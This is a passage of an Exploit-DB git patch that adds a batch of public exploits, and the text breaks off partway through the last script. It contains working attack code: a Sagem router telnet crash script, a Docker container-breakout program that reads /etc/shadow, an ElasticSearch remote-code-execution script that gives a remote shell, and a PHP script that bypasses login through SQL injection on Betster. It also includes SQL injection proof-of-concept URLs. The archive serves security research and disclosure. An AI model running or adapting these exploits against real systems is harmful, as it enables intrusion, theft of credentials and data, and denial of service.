From f8f13f8ec0687aa5441e91ecd8ede11aeb7b1415 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 13 Mar 2015 08:35:51 +0000
Subject: [PATCH] Update: 2015-03-13

22 new exploits
---
 files.csv                        |  26 ++++-
 platforms/hardware/dos/36309.py  |  40 +++++++
 platforms/linux/local/33808.c    | 193 +++++++++++++++----------------
 platforms/linux/remote/36337.py  |  56 +++++++++
 platforms/linux/remote/36352.txt |  10 ++
 platforms/php/webapps/36305.txt  |  47 ++++++++
 platforms/php/webapps/36306.txt  | 151 ++++++++++++++++++++++++
 platforms/php/webapps/36338.txt  |   9 ++
 platforms/php/webapps/36339.txt  |  11 ++
 platforms/php/webapps/36340.txt  |   9 ++
 platforms/php/webapps/36341.txt  |  10 ++
 platforms/php/webapps/36342.txt  |  11 ++
 platforms/php/webapps/36343.txt  |  10 ++
 platforms/php/webapps/36344.txt  |  10 ++
 platforms/php/webapps/36345.txt  |  10 ++
 platforms/php/webapps/36346.txt  |  16 +++
 platforms/php/webapps/36347.txt  |  10 ++
 platforms/php/webapps/36348.txt  |   9 ++
 platforms/php/webapps/36349.txt  |  12 ++
 platforms/php/webapps/36350.txt  |   7 ++
 platforms/php/webapps/36351.txt  |   7 ++
 platforms/windows/dos/36334.txt  |  69 +++++++++++
 platforms/windows/dos/36335.txt  |  68 +++++++++++
 platforms/windows/dos/36336.txt  |  73 ++++++++++++
 24 files changed, 775 insertions(+), 99 deletions(-)
 create mode 100755 platforms/hardware/dos/36309.py
 create mode 100755 platforms/linux/remote/36337.py
 create mode 100755 platforms/linux/remote/36352.txt
 create mode 100755 platforms/php/webapps/36305.txt
 create mode 100755 platforms/php/webapps/36306.txt
 create mode 100755 platforms/php/webapps/36338.txt
 create mode 100755 platforms/php/webapps/36339.txt
 create mode 100755 platforms/php/webapps/36340.txt
 create mode 100755 platforms/php/webapps/36341.txt
 create mode 100755 platforms/php/webapps/36342.txt
 create mode 100755 platforms/php/webapps/36343.txt
 create mode 100755 platforms/php/webapps/36344.txt
 create mode 100755 platforms/php/webapps/36345.txt
 create mode 100755 platforms/php/webapps/36346.txt
 create mode 100755 platforms/php/webapps/36347.txt
 create mode 100755 platforms/php/webapps/36348.txt
 create mode 100755 platforms/php/webapps/36349.txt
 create mode 100755 platforms/php/webapps/36350.txt
 create mode 100755 platforms/php/webapps/36351.txt
 create mode 100755 platforms/windows/dos/36334.txt
 create mode 100755 platforms/windows/dos/36335.txt
 create mode 100755 platforms/windows/dos/36336.txt

diff --git a/files.csv b/files.csv
index a69e47a4a..36e7b5f83 100755
--- a/files.csv
+++ b/files.csv
@@ -7391,7 +7391,7 @@ id,file,description,date,author,platform,type,port
 7853,platforms/windows/local/7853.pl,"EleCard MPEG PLAYER - (.m3u ) Local Stack Overflow Exploit",2009-01-25,AlpHaNiX,windows,local,0
 7854,platforms/windows/dos/7854.pl,"MediaMonkey 3.0.6 - (.m3u) Local Buffer Overflow PoC",2009-01-25,AlpHaNiX,windows,dos,0
 7855,platforms/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
-7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
+7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
 7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 m3u file Local Buffer Overflow PoC",2009-01-25,Houssamix,windows,dos,0
 7858,platforms/hardware/remote/7858.php,"Siemens ADSL SL2-141 - CSRF Exploit",2009-01-25,spdr,hardware,remote,0
 7859,platforms/php/webapps/7859.pl,"MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit",2009-01-25,StAkeR,php,webapps,0
@@ -30456,7 +30456,7 @@ id,file,description,date,author,platform,type,port
 33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0
 33805,platforms/linux/remote/33805.pl,"AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0
 33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888
-33808,platforms/linux/local/33808.c,"docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
+33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
 33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0
 33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
@@ -32724,8 +32724,11 @@ id,file,description,date,author,platform,type,port
 36302,platforms/php/webapps/36302.txt,"Joomla Content Component 'year' Parameter SQL Injection Vulnerability",2011-11-14,E.Shahmohamadi,php,webapps,0
 36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection Vulnerability",2015-03-06,"ITAS Team",php,webapps,80
 36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,metasploit,windows,remote,5555
+36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection Vulnerability",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0
+36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass And SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0
 36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 admin_index.php SITE_NAME Parameter XSS",2011-11-13,"Gjoko Krstic",php,webapps,0
 36308,platforms/php/webapps/36308.txt,"Webistry 1.6 'pid' Parameter SQL Injection Vulnerability",2011-11-16,CoBRa_21,php,webapps,0
+36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash PoC",2015-03-08,"Loudiyi Mohamed",hardware,dos,0
 36310,platforms/lin_x86-64/local/36310.txt,"Rowhammer: Linux Kernel Privilege Escalation PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0
 36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer: NaCl Sandbox Escape PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0
 36313,platforms/php/webapps/36313.txt,"webERP <= 4.3.8 Multiple Script URI XSS",2011-11-17,"High-Tech Bridge SA",php,webapps,0
@@ -32749,3 +32752,22 @@ id,file,description,date,author,platform,type,port
 36331,platforms/php/webapps/36331.txt,"Dolibarr ERP/CRM /user/index.php Multiple Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0
 36332,platforms/php/webapps/36332.txt,"Dolibarr ERP/CRM /user/info.php id Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0
 36333,platforms/php/webapps/36333.txt,"Dolibarr ERP/CRM /admin/boxes.php rowid Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0
+36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0
+36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0
+36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0
+36337,platforms/linux/remote/36337.py,"ElasticSearch Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
+36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
+36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
+36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
+36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
+36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/googlemap.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
+36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 /modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition Parameter XSS",2011-11-23,Prestashop,php,webapps,0
+36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 /admin/ajaxfilemanager/ajax_save_text.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
+36345,platforms/php/webapps/36345.txt,"Prestashop 1.4.4.1 'displayImage.php' HTTP Response Splitting Vulnerability",2011-11-23,RGouveia,php,webapps,0
+36346,platforms/php/webapps/36346.txt,"Zen Cart CMS 1.3.9h Multiple Cross Site Scripting Vulnerabilities",2011-11-23,RPinto,php,webapps,0
+36347,platforms/php/webapps/36347.txt,"Hastymail2 'rs' Parameter Cross Site Scripting Vulnerability",2011-11-22,HTrovao,php,webapps,0
+36348,platforms/php/webapps/36348.txt,"Pro Clan Manager 0.4.2 SQL Injection Vulnerability",2011-11-23,anonymous,php,webapps,0
+36349,platforms/php/webapps/36349.txt,"AdaptCMS 2.0 SQL Injection Vulnerability",2011-11-24,X-Cisadane,php,webapps,0
+36350,platforms/php/webapps/36350.txt,"Balitbang CMS 3.3 index.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0
+36351,platforms/php/webapps/36351.txt,"alitbang CMS 3.3 alumni.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0
+36352,platforms/linux/remote/36352.txt,"Apache HTTP Server 7.0.x 'mod_proxy' Reverse Proxy Security Bypass Vulnerability",2011-11-24,"Prutha Parikh",linux,remote,0
diff --git a/platforms/hardware/dos/36309.py b/platforms/hardware/dos/36309.py
new file mode 100755
index 000000000..b3e2ae1fe
--- /dev/null
+++ b/platforms/hardware/dos/36309.py
@@ -0,0 +1,40 @@
+# Title              : Sagem F@st 3304-V2 Telnet Crash POC
+# Vendor             : http://www.sagemcom.com
+# Severity           : High
+# Tested Router      : Sagem F@st 3304-V2 (3304-V1, other versions may also be affected)
+# Date               : 2015-03-08
+# Author             : Loudiyi Mohamed
+# Contact            : Loudiyi.2010@gmail.com
+# Blog               : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603
+# Vulnerability description:
+#==========================
+#A Memory Corruption Vulnerability is detected on Sagem F@st 3304-V2 Telnet service. An attacker can crash the router by sending a very long string.
+#This exploit connects to Sagem F@st 3304-V2 Telnet (Default port 23) and sends a very long string "X"*500000.
+#After the exploit is sent, the telnet service will crash and the router will reboot automatically.
+ 
+#Usage: python SagemDos.py "IP address"
+
+# Code
+#========================================================================
+ #!/usr/bin/python
+import socket
+import sys
+print("######################################")
+print("#    DOS Sagem F@st3304 v1-v2        #")
+print("#   	----------                  #")
+print("#       BY  LOUDIYI MOHAMED          #")
+print("#####################################")
+if (len(sys.argv)<2):
+	print "Usage: %s <host> " % sys.argv[0]
+	print "Example: %s 192.168.1.1 " % sys.argv[0]
+	exit(0)
+print "\nSending evil	buffer..."
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+try:
+ s.connect((sys.argv[1], 23))
+ buffer = "X"*500000
+ s.send(buffer)
+except:
+ print "Could not connect to Sagem Telnet!"
+#========================================================================
+
diff --git a/platforms/linux/local/33808.c b/platforms/linux/local/33808.c
index 59c57da8f..fa166d47b 100755
--- a/platforms/linux/local/33808.c
+++ b/platforms/linux/local/33808.c
@@ -47,142 +47,141 @@
 
 
 struct my_file_handle {
-	unsigned int handle_bytes;
-	int handle_type;
-	unsigned char f_handle[8];
+    unsigned int handle_bytes;
+    int handle_type;
+    unsigned char f_handle[8];
 };
 
 
 
 void die(const char *msg)
 {
-	perror(msg);
-	exit(errno);
+    perror(msg);
+    exit(errno);
 }
 
 
 void dump_handle(const struct my_file_handle *h)
 {
-	fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes,
-	        h->handle_type);
-	for (int i = 0; i < h->handle_bytes; ++i) {
-		fprintf(stderr,"0x%02x", h->f_handle[i]);
-		if ((i + 1) % 20 == 0)
-			fprintf(stderr,"\n");
-		if (i < h->handle_bytes - 1)
-			fprintf(stderr,", ");
-	}
-	fprintf(stderr,"};\n");
+    fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes,
+            h->handle_type);
+    for (int i = 0; i < h->handle_bytes; ++i) {
+        fprintf(stderr,"0x%02x", h->f_handle[i]);
+        if ((i + 1) % 20 == 0)
+            fprintf(stderr,"\n");
+        if (i < h->handle_bytes - 1)
+            fprintf(stderr,", ");
+    }
+    fprintf(stderr,"};\n");
 }
 
 
 int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)
 {
-	int fd;
-	uint32_t ino = 0;
-	struct my_file_handle outh = {
-		.handle_bytes = 8,
-		.handle_type = 1
-	};
-	DIR *dir = NULL;
-	struct dirent *de = NULL;
+    int fd;
+    uint32_t ino = 0;
+    struct my_file_handle outh = {
+        .handle_bytes = 8,
+        .handle_type = 1
+    };
+    DIR *dir = NULL;
+    struct dirent *de = NULL;
 
-	path = strchr(path, '/');
+    path = strchr(path, '/');
 
-	// recursion stops if path has been resolved
-	if (!path) {
-		memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
-		oh->handle_type = 1;
-		oh->handle_bytes = 8;
-		return 1;
-	}
-	++path;
-	fprintf(stderr, "[*] Resolving '%s'\n", path);
+    // recursion stops if path has been resolved
+    if (!path) {
+        memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
+        oh->handle_type = 1;
+        oh->handle_bytes = 8;
+        return 1;
+    }
+    ++path;
+    fprintf(stderr, "[*] Resolving '%s'\n", path);
 
-	if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
-		die("[-] open_by_handle_at");
+    if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
+        die("[-] open_by_handle_at");
 
-	if ((dir = fdopendir(fd)) == NULL)
-		die("[-] fdopendir");
+    if ((dir = fdopendir(fd)) == NULL)
+        die("[-] fdopendir");
 
-	for (;;) {
-		de = readdir(dir);
-		if (!de)
-			break;
-		fprintf(stderr, "[*] Found %s\n", de->d_name);
-		if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
-			fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
-			ino = de->d_ino;
-			break;
-		}
-	}
+    for (;;) {
+        de = readdir(dir);
+        if (!de)
+            break;
+        fprintf(stderr, "[*] Found %s\n", de->d_name);
+        if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
+            fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
+            ino = de->d_ino;
+            break;
+        }
+    }
 
-	fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
+    fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
 
 
-	if (de) {
-		for (uint32_t i = 0; i < 0xffffffff; ++i) {
-			outh.handle_bytes = 8;
-			outh.handle_type = 1;
-			memcpy(outh.f_handle, &ino, sizeof(ino));
-			memcpy(outh.f_handle + 4, &i, sizeof(i));
+    if (de) {
+        for (uint32_t i = 0; i < 0xffffffff; ++i) {
+            outh.handle_bytes = 8;
+            outh.handle_type = 1;
+            memcpy(outh.f_handle, &ino, sizeof(ino));
+            memcpy(outh.f_handle + 4, &i, sizeof(i));
 
-			if ((i % (1<<20)) == 0)
-				fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
-			if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
-				closedir(dir);
-				close(fd);
-				dump_handle(&outh);
-				return find_handle(bfd, path, &outh, oh);
-			}
-		}
-	}
+            if ((i % (1<<20)) == 0)
+                fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
+            if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
+                closedir(dir);
+                close(fd);
+                dump_handle(&outh);
+                return find_handle(bfd, path, &outh, oh);
+            }
+        }
+    }
 
-	closedir(dir);
-	close(fd);
-	return 0;
+    closedir(dir);
+    close(fd);
+    return 0;
 }
 
 
 int main()
 {
-	char buf[0x1000];
-	int fd1, fd2;
-	struct my_file_handle h;
-	struct my_file_handle root_h = {
-		.handle_bytes = 8,
-		.handle_type = 1,
-		.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
-	};
+    char buf[0x1000];
+    int fd1, fd2;
+    struct my_file_handle h;
+    struct my_file_handle root_h = {
+        .handle_bytes = 8,
+        .handle_type = 1,
+        .f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
+    };
 
-	fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014             [***]\n"
-	       "[***] The tea from the 90's kicks your sekurity again.     [***]\n"
-	       "[***] If you have pending sec consulting, I'll happily     [***]\n"
-	       "[***] forward to my friends who drink secury-tea too!      [***]\n\n<enter>\n");
+    fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014             [***]\n"
+           "[***] The tea from the 90's kicks your sekurity again.     [***]\n"
+           "[***] If you have pending sec consulting, I'll happily     [***]\n"
+           "[***] forward to my friends who drink secury-tea too!      [***]\n\n<enter>\n");
 
-	read(0, buf, 1);
+    read(0, buf, 1);
 
-	// get a FS reference from something mounted in from outside
-	if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0)
-		die("[-] open");
+    // get a FS reference from something mounted in from outside
+    if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0)
+        die("[-] open");
 
-	if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
-		die("[-] Cannot find valid handle!");
+    if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
+        die("[-] Cannot find valid handle!");
 
-	fprintf(stderr, "[!] Got a final handle!\n");
-	dump_handle(&h);
+    fprintf(stderr, "[!] Got a final handle!\n");
+    dump_handle(&h);
 
-	if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
-		die("[-] open_by_handle");
+    if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
+        die("[-] open_by_handle");
 
-	memset(buf, 0, sizeof(buf));
-	if (read(fd2, buf, sizeof(buf) - 1) < 0)
-		die("[-] read");
+    memset(buf, 0, sizeof(buf));
+    if (read(fd2, buf, sizeof(buf) - 1) < 0)
+        die("[-] read");
 
-	fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);
+    fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);
 
-	close(fd2); close(fd1);
+    close(fd2); close(fd1);
 
-	return 0;
+    return 0;
 }
-
diff --git a/platforms/linux/remote/36337.py b/platforms/linux/remote/36337.py
new file mode 100755
index 000000000..0f25c542c
--- /dev/null
+++ b/platforms/linux/remote/36337.py
@@ -0,0 +1,56 @@
+#!/bin/python2
+# coding: utf-8
+# Author: Darren Martyn, Xiphos Research Ltd.
+# Version: 20150309.1
+# Licence: WTFPL - wtfpl.net
+import json
+import requests
+import sys
+import readline
+readline.parse_and_bind('tab: complete')
+readline.parse_and_bind('set editing-mode vi')
+__version__ = "20150309.1"
+
+def banner():
+    print """\x1b[1;32m
+??????  ???    ???        ?????? ????????? ??? ??????    ??????  ??? ?? ??????  ???     ???    
+??   ? ????   ??????    ???    ? ?  ??? ?????????? ??  ???    ? ???? ?????   ? ????    ????    
+????   ????   ???  ???  ? ????   ? ???? ?????????    ? ? ????   ????????????   ????    ????    
+???  ? ????   ?????????   ?   ???? ???? ? ???????? ????  ?   ?????? ??? ???  ? ????    ????    
+?????????????????   ?????????????  ???? ? ????? ????? ?????????????????????????????????????????
+?? ?? ?? ???  ???   ????? ??? ? ?  ? ??   ??  ? ?? ?  ?? ??? ? ? ? ??????? ?? ?? ???  ?? ???  ?
+ ? ?  ?? ? ?  ? ?   ?? ?? ??  ? ?    ?     ? ?  ?  ?   ? ??  ? ? ? ??? ? ? ?  ?? ? ?  ?? ? ?  ?
+   ?     ? ?    ?   ?   ?  ?  ?    ?       ? ??        ?  ?  ?   ?  ?? ?   ?     ? ?     ? ?   
+   ?  ?    ?  ?     ?  ?      ?            ?  ? ?            ?   ?  ?  ?   ?  ?    ?  ?    ?  ?
+                                              ?                                                
+ Exploit for ElasticSearch , CVE-2015-1427   Version: %s\x1b[0m""" %(__version__)
+
+def execute_command(target, command):
+    payload = """{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"}}}""" %(command)
+    try:
+        url = "http://%s:9200/_search?pretty" %(target)
+        r = requests.post(url=url, data=payload)
+    except Exception, e:
+        sys.exit("Exception Hit"+str(e))
+    values = json.loads(r.text)
+    fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0]
+    print fuckingjson.strip()
+        
+
+def exploit(target):
+    print "{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something"
+    while True:
+        cmd = raw_input("~$ ")
+        if cmd == "exit":
+            sys.exit("{!} Shell exiting!")
+        else:
+            execute_command(target=target, command=cmd)
+    
+def main(args):
+    banner()
+    if len(args) != 2:
+        sys.exit("Use: %s target" %(args[0]))
+    exploit(target=args[1])
+
+if __name__ == "__main__":
+	main(args=sys.argv)
\ No newline at end of file
diff --git a/platforms/linux/remote/36352.txt b/platforms/linux/remote/36352.txt
new file mode 100755
index 000000000..962b34639
--- /dev/null
+++ b/platforms/linux/remote/36352.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/50802/info
+
+Apache HTTP Server is prone to a security-bypass vulnerability.
+
+Successful exploits will allow attackers to bypass certain security restrictions and obtain sensitive information about running web applications. 
+
+The following example patterns are available:
+
+RewriteRule ^(.*) http://www.example.com$1
+ProxyPassMatch ^(.*) http://www.example.com$1 
\ No newline at end of file
diff --git a/platforms/php/webapps/36305.txt b/platforms/php/webapps/36305.txt
new file mode 100755
index 000000000..36949af14
--- /dev/null
+++ b/platforms/php/webapps/36305.txt
@@ -0,0 +1,47 @@
+# Title: Elastix v2.x Blind SQL Injection Vulnerability
+# Author: Ahmed Aboul-Ela
+# Twitter: https://twitter.com/aboul3la
+# Vendor : http://www.elastix.org
+# Version: v2.5.0 and prior versions should be affected too
+ 
+- Vulnerable Source Code snippet in "a2billing/customer/iridium_threed.php":
+ 
+  <?php
+  [...]
+  line 5: getpost_ifset (array('transactionID', 'sess_id', 'key', 'mc_currency', 'currency', 'md5sig', 
+  'merchant_id', 'mb_amount', 'status','mb_currency','transaction_id', 'mc_fee', 'card_number'));
+
+  line 34: $QUERY = "SELECT id, cardid, amount, vat, paymentmethod, cc_owner, cc_number, cc_expires, 
+  creationdate, status, cvv, credit_card_type,currency, item_id, item_type " . 
+  " FROM cc_epayment_log " . " WHERE id = ".$transactionID;
+
+  line 37: $transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY);
+  [...]
+  ?>    
+  
+   The GET parameter transactionID was used directly in the SQL query 
+   without any sanitization which lead directly to SQL Injection vulnerability.
+ 
+- Proof of Concept: 
+ 
+  http://[host]/a2billing/customer/iridium_threed.php?transactionID=-1 and 1=benchmark(2000000,md5(1))
+  
+  The backend response will delay for few seconds, which means the benchmark() function was executed successfully
+ 
+- Mitigation:
+   
+   The vendor has released a fix for the vulnerability. It is strongly recommended to update your elastix server now
+   
+   [~] yum update elastix-a2billing
+ 
+ 
+- Time-Line:
+ 
+    Sat, Feb 14, 2015 at 2:19 PM: Vulnerability report sent to Elastix
+    Wed, Feb 18, 2015 at 4:29 PM: Confirmation of the issue from Elastix
+    Fri, Mar  6, 2015 at 8:39 PM: Elastix released a fix for the vulnerability
+    Sat, Mar  7, 2015 at 5:15 PM: The public responsible disclosure
+
+- Credits:
+ 
+    Ahmed Aboul-Ela - Cyber Security Analyst @ EG-CERT
\ No newline at end of file
diff --git a/platforms/php/webapps/36306.txt b/platforms/php/webapps/36306.txt
new file mode 100755
index 000000000..11c864d6d
--- /dev/null
+++ b/platforms/php/webapps/36306.txt
@@ -0,0 +1,151 @@
+<?php
+/*
+ 
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /        
+  / XXXXXX /
+ (________(          
+  `------'
+  
+ Exploit Title   : Betster (PHP Betoffice) Authentication Bypass and SQL Injection
+ Date            : 6 March 2015
+ Exploit Author  : CWH Underground
+ Discovered By   : ZeQ3uL
+ Site            : www.2600.in.th
+ Vendor Homepage : http://betster.sourceforge.net/
+ Software Link   : http://downloads.sourceforge.net/project/betster/betster-1.0.4.zip
+ Version         : 1.0.4
+ Tested on       : Linux, PHP 5.3.9
+   
+####################
+SOFTWARE DESCRIPTION
+####################
+   
+Betster is a Software to create a online bet-office based on PHP, MySQL and JavaScript. The system works with variable odds 
+(betting-exchange with variable decimal odds) and provides a CMS-like backend for handling the bets, users and categories.
+   
+################################################################
+VULNERABILITY: SQL Injection (showprofile.php, categoryedit.php)
+################################################################
+    
+An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
+User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
+An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
+depending on the query, DBMS and configuration.
+   
+/showprofile.php (LINE: 63)
+-----------------------------------------------------------------------------
+if (($session->getState()) && 
+	(($user->getStatus() == "administrator") || 
+	 ($user->getStatus() == "betmaster"))){
+	$mainhtml = file_get_contents("tpl/showprofile.inc");
+
+	$id = htmlspecialchars($_GET['id']);				<<<< WTF !!
+	$xuser = $db_mapper->getUserById($id);
+-----------------------------------------------------------------------------
+    
+/categoryedit.php (LINE: 52)
+-----------------------------------------------------------------------------
+$id = htmlspecialchars($_GET['id']);					<<<< WTF !!
+$action = htmlspecialchars($_GET['ac']);
+----------------------------------------------------------------------------- 
+
+###########################################
+VULNERABILITY: Authentication Bypass (SQLi)
+###########################################
+  
+File index.php (Login function) has SQL Injection vulnerability, "username" parameter supplied in POST parameter for checking valid credentials.
+The "username" parameter is not validated before passing into SQL query which arise authentication bypass issue.
+ 
+#####################################################
+EXPLOIT
+#####################################################
+  
+*/
+ 
+error_reporting(0);
+set_time_limit(0);
+ini_set("default_socket_timeout", 50);
+ 
+function http_send($host, $packet)
+{
+    if (!($sock = fsockopen($host, 80)))
+        die("\n[-] No response from {$host}:80\n");
+  
+    fputs($sock, $packet);
+    return stream_get_contents($sock);
+}
+ 
+print "\n+---------------------------------------------+";
+print "\n| Betster Auth Bypass & SQL Injection Exploit |";
+print "\n+---------------------------------------------+\n";
+  
+if ($argc < 3)
+{
+    print "\nUsage......: php $argv[0] <host> <path>\n";
+    print "\nExample....: php $argv[0] localhost /";
+    print "\nExample....: php $argv[0] localhost /betster/\n";
+    die();
+}
+ 
+$host = $argv[1];
+$path = $argv[2];
+
+$payload = "username=admin%27+or+%27a%27%3D%27a&password=cwh&login=LOGIN";
+
+$packet  = "GET {$path} HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Connection: close\r\n\r\n";
+
+   print "\n  ,--^----------,--------,-----,-------^--,   \n";
+   print "  | |||||||||   `--------'     |          O   \n";
+   print "  `+---------------------------^----------|   \n";
+   print "    `\_,-------, _________________________|   \n";
+   print "      / XXXXXX /`|     /                      \n";
+   print "     / XXXXXX /  `\   /                       \n";
+   print "    / XXXXXX /\______(                        \n";
+   print "   / XXXXXX /                                 \n";
+   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  \n";
+   print " (________(                                   \n";
+   print "  `------'                                    \n";
+
+$response = http_send($host, $packet);
+
+ if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");
+
+$packet  = "POST {$path}index.php HTTP/1.0\r\n";
+$packet .= "Host: {$host}\r\n";
+$packet .= "Cookie: {$sid[1]}\r\n";
+$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
+$packet .= "Content-Length: ".strlen($payload)."\r\n";
+$packet .= "Connection: close\r\n\r\n{$payload}";
+
+   print "\n\n[+] Bypassing Authentication...\n";
+   sleep(2);
+
+$response=http_send($host, $packet);
+
+preg_match('/menutitle">ADMIN/s', $response) ? print "\n[+] Authentication Bypass Successfully !!\n" : die("\n[-] Bypass Authentication Failed !!\n");
+ 
+$packet  = "GET {$path}showprofile.php?id=1%27%20and%201=2%20union%20select%201,concat(0x3a3a,0x557365723d,user(),0x202c2044425f4e616d653d,database(),0x3a3a),3,4,5,6,7--+ HTTP/1.0\r\n";
+$packet .= "Cookie: {$sid[1]}\r\n";
